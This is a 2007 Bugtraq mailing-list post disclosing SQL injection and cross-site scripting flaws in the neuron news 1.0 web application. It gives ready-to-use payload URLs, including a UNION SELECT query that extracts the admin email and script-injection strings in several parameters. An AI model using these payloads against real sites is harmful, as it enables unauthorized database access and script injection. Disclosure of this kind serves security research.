Bugtraq mailing list archives
neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)
From: hadihadi_zedehal_2006 () yahoo com
Date: 16 Dec 2007 23:13:42 -0000
#################################################################### # # # ...:::::neuron news1.0 Multiple Remote Vulnerabilities::::.... # # (sql injection/xss) # #################################################################### Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By : virangar security team (hadihadi & black.shadowes) --------------------------------- special tnx to:MR.nosrati,MR.hesy,satan,Zahra & all virangar members & all iranian hackerz greetz:to my best friend in the world hadi_aryaie2004 ------------------------------------ vlues: 1.sql injection: http://site.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/* ######################## 2.xss: http://site.com/patch/?q=viewtopic&topic=<script>alert(111111)</script> http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script> http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>&newsmonth=<script>alert(111111)</script> ######################## g00d l0uck
Current thread:
- neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss) hadihadi_zedehal_2006 (Dec 17)